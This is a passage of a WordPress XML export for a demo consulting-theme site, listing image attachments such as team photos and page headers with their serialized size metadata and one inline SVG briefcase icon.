		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/portfolio.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/portfolio.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/pheader-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>691</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/09/pheader-team.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-team-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-team-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-team-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-team-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-team-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-team-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-team-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"pheader-team-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"pheader-team-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/team5/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>694</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team5-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team5-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team5-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/team6/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>695</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team6-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team6-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team6-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team6-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team7</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/team7/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team7.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>696</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team7.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team7.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team7.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team7-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team7-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team7-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team7-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team7-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/team8/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team8.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>697</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team8.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team8.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team8.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team8-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team8-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team8-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team8-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team8-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/image1-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:53:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>699</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:53:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:53:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:959;s:6:"height";i:650;s:4:"file";s:23:"2020/09/image1-team.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:23:"image1-team-300x203.jpg";s:5:"width";i:300;s:6:"height";i:203;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"image1-team-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"image1-team-768x521.jpg";s:5:"width";i:768;s:6:"height";i:521;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"image1-team-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"image1-team-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"image1-team-959x600.jpg";s:5:"width";i:959;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-single-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/image1-single-team/</link>
		<pubDate>Thu, 10 Sep 2020 03:28:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>713</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 03:28:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 03:28:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-single-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>711</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-single-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:530;s:6:"height";i:500;s:4:"file";s:30:"2020/09/image1-single-team.jpg";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:30:"image1-single-team-300x283.jpg";s:5:"width";i:300;s:6:"height";i:283;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"image1-single-team-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"image1-single-team-530x400.jpg";s:5:"width";i:530;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/blog/pheader-blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>770</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-blog]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>768</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-blog.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/09/pheader-blog.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-blog-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-blog-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-blog-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-blog-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-blog-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-blog-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-blog-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"pheader-blog-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"pheader-blog-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-project</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/pheader-project/</link>
		<pubDate>Thu, 10 Sep 2020 10:20:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>774</wp:post_id>
